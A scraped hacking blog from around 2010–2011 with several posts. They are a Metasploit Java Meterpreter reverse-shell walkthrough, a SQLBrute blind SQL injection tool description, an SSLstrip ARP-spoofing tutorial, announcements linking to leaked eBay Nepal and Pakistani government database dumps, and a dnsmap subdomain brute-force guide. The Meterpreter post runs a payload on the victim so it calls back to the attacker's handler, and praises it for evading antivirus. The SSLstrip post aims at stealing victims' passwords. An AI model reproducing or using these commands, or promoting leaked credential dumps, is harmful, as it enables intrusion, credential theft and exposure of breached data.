<span style="font-size: small;"><b>Why using a java meterpreter you ask ?</b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>Well…you’ll see later…</b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b><span id="more-1298"></span></b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b><span style="text-decoration: underline;">Requirements:</span></b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>JRE 1.2 on the victim machine is enough although some features, like
routing tables or screenshots, require JRE 1.3, JRE 1.4 or JRE 1.6.</b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>You can find the java meterpreter payload jar file in:</b></span></div>
<pre style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>"/pentest/exploits/framework3/data/java/loader.jar"</b></span></pre>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>You will also need the “JavaMeterpreter.zip” file which you can download from <a href="https://www.metasploit.com/redmine/attachments/397/JavaMeterpreter.zip" target="_blank">HERE</a></b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b><strong>I have just noticed that manual
tweaking is no longer necessary the Metasploit framework now has the
java meterpreter listener built in.</strong></b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b><strong>That means you can skip steps 1 to 4 </strong></b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b><strong>and instead of using the patched php meterpreter you can use the java meterpreter directly.</strong></b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b><strong>I have also updated the script to use the java payload as well.</strong></b></span></div>
<pre style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 578 exploits - 297 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r10024 updated today (2010.08.17)
msf > use exploit/multi/handler
msf exploit(handler) > <strong>set PAYLOAD java/meterpreter/reverse_tcp</strong>
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(handler) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) ></b></span></pre>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>Lets see how to set it up manually...</b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>1. Download</b></span></div>
<pre style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>root@Blackbox:~# cd /tmp/
root@Blackbox:/tmp# wget https://www.metasploit.com/redmine/attachments/397/JavaMeterpreter.zip --no-check-certificate</b></span></pre>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>2. Unzip</b></span></div>
<pre style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>root@Blackbox:/tmp# unzip JavaMeterpreter.zip</b></span></pre>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>3. Copy necessary files</b></span></div>
<pre style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>root@Blackbox:/tmp# cd extensions/
root@Blackbox:/tmp/extensions# cp {ext_server_stdapi.jar,meterpreter.jar} /pentest/exploits/framework3/data/meterpreter</b></span></pre>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>4. Backup PHP Meterpreter files and Change jar files extensions to php (<strong>This will break PHP Meterpreter support</strong>)</b></span></div>
<pre style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>root@Blackbox:/tmp/extensions# cd /pentest/exploits/framework3/data/meterpreter
root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv meterpreter.php meterpreter.phpx
root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv ext_server_stdapi.php ext_server_stdapi.phpx
root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv meterpreter.jar meterpreter.php
root@Blackbox:/pentest/exploits/framework3/data/meterpreter# mv ext_server_stdapi.jar ext_server_stdapi.php</b></span></pre>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>5. Launch msfconsole and setup a multi/handler listener with a "php/meterpreter/reverse_tcp" payload.</b></span></div>
<pre style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>root@Blackbox:/pentest/exploits/framework3/data/meterpreter# cd ..
root@Blackbox:/pentest/exploits/framework3/data# cd ..
root@Blackbox:/pentest/exploits/framework3# ./msfconsole</b></span></pre>
<pre style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ \/ \/ |__|
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 577 exploits - 295 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r9993 updated today (2010.08.13)
msf > use exploit/multi/handler
smsf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...</b></span></pre>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>6. Copy (transfer) “/pentest/exploits/framework3/data/java/loader.jar” to victim pc and run it as follows</b></span></div>
<pre style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>C:\Documents and Settings\NightRanger>java -jar loader.jar
Usage: java -jar loader.jar []</b></span></pre>
<pre style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>C:\Documents and Settings\NightRanger>java -jar loader.jar 192.168.1.104 4444</b></span></pre>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>7. Get your Meterpreter JAVA Shell…</b></span></div>
<pre style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>[*] Sending stage (21717 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.104:4444 -> 192.168.1.106:1435) at Sat Aug 14 20:34:57 +0300 2010
meterpreter > sysinfo
Computer: exploit
OS : Windows XP 5.1 (x86)
meterpreter > getuid
Server username: NightRanger
meterpreter ></b></span></pre>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>P.S:</b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>The java meterpreter will work for linux systems as well….</b></span></div>
<pre style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>root@Blackbox:/pentest/exploits/framework3/data/java# java -jar loader.jar 192.168.1.104 4444</b></span></pre>
<pre style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>meterpreter > exit
[*] Meterpreter session 1 closed. Reason: User exit
msf exploit(handler) > rexploit
[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...
[*] Sending stage (21717 bytes) to 192.168.1.104
[*] Meterpreter session 2 opened (192.168.1.104:4444 -> 192.168.1.104:59806) at Sat Aug 14 20:47:40 +0300 2010
meterpreter > sysinfo
Computer: Blackbox
OS : Linux 2.6.34 (i386)
meterpreter > getuid
Server username: root
meterpreter ></b></span></pre>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>I have modified my “Evil Java Applet Wizard” script to use the JAVA Meterpreter Payload instead of a binary executable.</b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>The reasons for that are:</b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>1. Antivirus software will not detect JAVA Meterpreter as a malicious file (as you can see in the demo video below).</b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>2. It make sense to use the Java Meterpreter payload if you are already using athe JAVA Applet client side attack vector.</b></span></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>If it worked it means that the victim has Java installed on his system which allowes us to use this payload.</b></span></div>
</div>
Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com5tag:blogger.com,1999:blog-3299468824600484367.post-18462961960600434242011-09-04T22:21:00.000-07:002011-09-04T22:21:18.212-07:00SQLbrute<div dir="ltr" style="text-align: left;" trbidi="on">
<h2 style="color: #666666;">
<span class="mw-headline"> Description </span></h2>
<span style="color: #666666;">
</span><div style="color: #666666;">
<b>SQLBrute</b> is a tool for brute forcing data out of databases
using blind SQL injection vulnerabilities. It supports time based and
error based exploit types on Microsoft SQL Server, and error based
exploit on Oracle. It is written in Python, uses multi-threading, and
doesn’t require non-standard libraries (there is some code in there for
pycurl, but it is disabled because it isn’t finished).
</div>
<pre style="color: #666666;">
Usage: ./sqlbrute.py options url
[--help|-h]
[--verbose|-v]
[--server|-d oracle|sqlserver]
[--error|-e regex]
[--threads|-s number]
[--cookie|-k string]
[--time|-n]
[--data|-p string]
[--database|-f database]
[--table|-t table]
[--column|-c column]
[--where|-w column=data]
[--header|-x header::val]
--data allows you to specify POST data for a form post. Takes a string containing all the data as an argument
--cookie allows you to specify the cookies to be supplied. Takes a string containing all the cookies as an argument
--header allows you to specify arbitrary HTTP headers to include in the request (e.g. Accepts headers or similar).
The header name and value need to be supplied as a single argument of the form header::value
Other options modify the default behaviour of the tool:
--server forces the tool to use Oracle or SQL Server exploit techniques. This is needed because the tool
defaults to SQL Server, and won't intelligently detect that Oracle is in use
--threads specifies how many worker threads the tool will use to send requests. This defaults to 5, however
this should be reduced if you are getting unreliable results (especially when doing time based testing).
Setting this too high has a tendency to max the CPU on your machine, and have bad effects on the machine you're testing
--time forces the tool to use time based testing instead of error based testing
--verbose turns on verbose output. By default the tool doesn't output anything until it has completely
enumerated an entry, which can lead to wondering whether it is actually doing anything. Using verbose
once will output preliminary results - allowing you to see that its working. Using verbose twice will output
requests and responses to allow debug issues with the tool
--output allows us to specify an output file for the results. Otherwise the only results we will get will be to stdout
The remainder of the options specify the data to be brute forced from the database:
--error specifies a regular expression to look for that appears in one of the AND or OR cases noted above.
Usually this will be something identifiable such as an error message, or a message noting that no results were found
--database (SQL Server only) specifies what database to use for enumerating data
--table specifies what table to use for enumerating data
--column specifies what column to use for enumerating data
--where allows us to filter what data to brute force out by specifying a WHERE clause when enumerating a column.
The where data must be in the form column_name=data (i.e. WHERE foo=bar)
The tool is designed to be used in a logical progression:
Running the tool without specifying a database, table, or column parameter will enumerate the list of databases for
SQL Server, and the list of user tables for Oracle
Running the tool with the name of a database (SQL Server only) will enumerate the list of tables
Running the tool with a table parameter (plus database parameter for SQL Server) will enumerate the columns in that table
Running the tool with a column parameter (with table and database parameters if applicable) will enumerate the data
in that column of that parameter. You can then find matching values in other columns of the table through
using a --where command line option
</pre>
<span style="color: #666666;">
</span><a href="" id="Tutorials_and_Demos" name="Tutorials_and_Demos" style="color: #666666;"></a><h2 style="color: #666666;">
<span class="mw-headline"><br /></span></h2>
</div>
Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com3tag:blogger.com,1999:blog-3299468824600484367.post-69855808035037755862011-09-04T08:34:00.000-07:002011-09-04T08:34:12.352-07:00SSLstrip Tutorial<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; color: #666666; font-family: Arial,Helvetica,sans-serif; text-align: center;">
<span style="font-size: small;"><b><a href="http://3.bp.blogspot.com/_p3XIipv981Y/S88RVdmcG1I/AAAAAAAAAEA/g3d5W2XJFFs/s1600/MITM.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://3.bp.blogspot.com/_p3XIipv981Y/S88RVdmcG1I/AAAAAAAAAEA/g3d5W2XJFFs/s320/MITM.jpg" width="320" /></a></b></span></div>
<span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"><b><br style="color: #666666;" /><span style="color: #666666;">
SSLstrip was released by Moxie to demonstrate the vulnerabilities he spoke about at Blackhat 2009.
In this video we will look at how to get started with SSLstrip. We
setup 2 vmware machines, one running Widnows XP (victim) and the other
Backtrack 3 (Attacker). Before we actually begin hacking using SSLstrip,
we need to setup the entire Man in the Middle Mechanism and packet
redirection / forwarding mechanism. We do this by using the following
commands in sequence:</span><br style="color: #666666;" /><span style="color: #666666;">
</span><br style="color: #666666;" /><span style="color: #666666;">
1. Setting up IP Forwarding:</span><br style="color: #666666;" /><span style="color: #666666;">
</span><br style="color: #666666;" /><span style="color: #666666;">
echo 1 > /proc/sys/net/ipv4/ip_forward</span><br style="color: #666666;" /><span style="color: #666666;">
</span><br style="color: #666666;" /><span style="color: #666666;">
2. ARP MITM attack between Victim and Gateway:</span><br style="color: #666666;" /><span style="color: #666666;">
</span><br style="color: #666666;" /><span style="color: #666666;">
arpspoof -i eth0 -t 192.168.1.6 192.168.1.1 </span><br style="color: #666666;" /><span style="color: #666666;">
</span><br style="color: #666666;" /><span style="color: #666666;">
3. Setting up port redirection using Iptables:</span><br style="color: #666666;" /><span style="color: #666666;">
</span><br style="color: #666666;" /><span style="color: #666666;">
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000</span><br style="color: #666666;" /><span style="color: #666666;">
</span><br style="color: #666666;" /><span style="color: #666666;">
4. Start the SSLstrip tool and make it listen to port 10000 (default anyways)</span><br style="color: #666666;" /><span style="color: #666666;">
</span><br style="color: #666666;" /><span style="color: #666666;">
python sslstrip.py -w secret </span><br style="color: #666666;" /><span style="color: #666666;">
</span><br style="color: #666666;" /><span style="color: #666666;">
Once this setup is up and running perfectly, all of our victim's traffic
will be routed through us. In particular, HTTP traffic will be
redirected to our port 10000, where SSLstrip is listening. After this we
will be able to eavesdrop and steal all of the victim's passwords sent
supposedly over "SSL". </span><br style="color: #666666;" /><span style="color: #666666;">
</span><br style="color: #666666;" /><span style="color: #666666;">
</span></b></span><div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b><br /></b></span></div>
</div>
Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com1tag:blogger.com,1999:blog-3299468824600484367.post-86677384521766953222011-09-04T08:18:00.000-07:002011-09-30T23:36:43.593-07:00Ebay got hacked by team open fire<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKsxUbIvyrt261XgT3SxQZoHj2PqIBH1EU-4OX97p4LiEQNhNRahBUCEkhmHnProD6U0xDI1Gnl6vtgJF3s-a3mMD3KWJsRdcmPfLEqkCu2QiGFhTLbr9tLjdoFAuXJpDONpr9gKRxC-g/s1600/340104_1481955066650_1767058290_711821_3463368_o.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKsxUbIvyrt261XgT3SxQZoHj2PqIBH1EU-4OX97p4LiEQNhNRahBUCEkhmHnProD6U0xDI1Gnl6vtgJF3s-a3mMD3KWJsRdcmPfLEqkCu2QiGFhTLbr9tLjdoFAuXJpDONpr9gKRxC-g/s320/340104_1481955066650_1767058290_711821_3463368_o.jpg" width="320" /></a></div>
<br />
Ebay (Nepal got hacked) by Team Open Fire<br />
<br />
Open fire hacked eBay.com.np<br />
leaking the admin username and password <br />
in public <br />
You can find the <a href="http://pastebin.com/S1WiChW8">DB here<br /><br /><span style="font-size: small;"><b><br /></b></span></a><span style="font-size: small;"><b><a href="http://adf.ly/2yvsn">CLICK HERE</a></b></span></div>
Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com6tag:blogger.com,1999:blog-3299468824600484367.post-65643695420030551122011-09-04T08:13:00.000-07:002011-09-04T08:14:23.375-07:00Federally Administered Tribal Areas (FATA) of Pakistan and Afghanistan database hacked by Team Open Fire<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKsxUbIvyrt261XgT3SxQZoHj2PqIBH1EU-4OX97p4LiEQNhNRahBUCEkhmHnProD6U0xDI1Gnl6vtgJF3s-a3mMD3KWJsRdcmPfLEqkCu2QiGFhTLbr9tLjdoFAuXJpDONpr9gKRxC-g/s1600/340104_1481955066650_1767058290_711821_3463368_o.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKsxUbIvyrt261XgT3SxQZoHj2PqIBH1EU-4OX97p4LiEQNhNRahBUCEkhmHnProD6U0xDI1Gnl6vtgJF3s-a3mMD3KWJsRdcmPfLEqkCu2QiGFhTLbr9tLjdoFAuXJpDONpr9gKRxC-g/s320/340104_1481955066650_1767058290_711821_3463368_o.jpg" width="320" /></a></div>
<br />
<br />
Federally Administered Tribal Areas (FATA) of Pakistan and Afghanistan
database hacked by Team Open Fire & Team Blacklisted. They Hacked
into the DB of FATA's website and exposed lots of credential information
like DB name, tables, cities, config files, user names passwords, GOV
secretes and so on.<br />
<br />
<br />
To see the hacked DB click <a href="http://pastebin.com/mbhzm5sR"><b>Here </b></a><br />
<br /></div>
Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com0tag:blogger.com,1999:blog-3299468824600484367.post-55167215186278835322011-09-04T08:05:00.000-07:002011-09-04T08:07:45.102-07:00Bruteforce Subdomains with DNSMap<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="field field-type-filefield field-field-image" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="field-items">
<div class="field-item odd">
<span style="font-size: small;"><b>
</b><b><img alt="DNSMap" class="imagecache imagecache-460-width imagecache-default imagecache-460-width_default" height="346" src="http://greyhat-security.com/sites/default/files/imagecache/460-width/story-slideshow/mr._p/dnsmap_logo_2.png" title="" width="460" /> </b></span></div>
</div>
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
</b></span><br />
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b> This one's really quick - if you've ever needed to know some
subdomains of a site, consider "dnsmap". It will bruteforce a bunch of
subdomains for any domain you give it - and you can customise your own
domain. It's pretty simple. Here's the linux instructions:</b></span></div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b></b></span><span style="color: #666666; font-size: small;"><b>DOWNLOAD IT</b></span><br />
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b></b></span><br />
<blockquote style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div>
<span style="font-size: small;"><b><i>tar xf dnsmap-latest.tar && cd dnsmap</i></b></span></div>
</blockquote>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
</b></span><br />
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>3. Make sure you have a C compiler installed (i.e. GNU C++ Compiler) and compile it:</b></span></div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
</b></span><br />
<blockquote style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div>
<span style="font-size: small;"><b><i>gcc dnsmap.c -o dnsmap</i></b></span></div>
</blockquote>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
</b></span><br />
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>4. Make it executable:</b></span></div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
</b></span><br />
<blockquote style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div>
<span style="font-size: small;"><b><i>chmod +x dnsmap</i></b></span></div>
</blockquote>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
</b></span><br />
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>5. Run it:</b></span></div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
</b></span><br />
<blockquote style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div>
<span style="font-size: small;"><b><i>./dnsmap domain.com</i></b></span></div>
</blockquote>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
</b></span><br />
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>6. View results:</b></span></div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
</b></span><br />
<blockquote style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div>
<span style="font-size: small;"><b><i>dnsmap - DNS Network Mapper by pagvac</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>(<a href="http://ikwt.com/" title="http://ikwt.com">http://ikwt.com</a>, <a href="http://foro.elhacker.net/" title="http://foro.elhacker.net">http://foro.elhacker.net</a>)</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>Searching subhosts on domain google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>ap.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.173.103</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:209.85.173.104</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:209.85.173.147</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:209.85.173.99</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>blog.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:72.14.207.191</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>catalog.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:74.125.19.100</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:74.125.19.101</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:74.125.19.102</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:74.125.19.113</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>catalogue.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:74.125.19.113</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:74.125.19.100</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:74.125.19.101</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:74.125.19.102</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>directory.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.173.103</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:209.85.173.104</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:209.85.173.147</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:209.85.173.99</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>download.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.173.99</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:209.85.173.103</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:209.85.173.104</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:209.85.173.147</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>downloads.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.173.147</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:209.85.173.99</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:209.85.173.103</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:209.85.173.104</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>email.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:74.125.19.100</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:74.125.19.101</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:74.125.19.102</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:74.125.19.113</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>finance.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.173.104</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:209.85.173.147</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:209.85.173.99</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:209.85.173.103</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>groups.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.171.113</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:209.85.171.100</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:209.85.171.101</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:209.85.171.102</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>images.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.173.147</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:209.85.173.99</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:209.85.173.103</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:209.85.173.104</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>labs.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:74.125.19.113</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:74.125.19.100</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:74.125.19.101</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:74.125.19.102</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>mail.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.201.18</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:209.85.201.19</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:209.85.201.83</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>mobile.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.173.193</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>news.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.171.99</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:209.85.171.103</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:209.85.171.104</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:209.85.171.147</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>photo.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:74.125.47.91</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:74.125.47.93</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:74.125.47.136</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:74.125.47.190</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>photos.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:74.125.47.190</i></b></span></div>
<div>
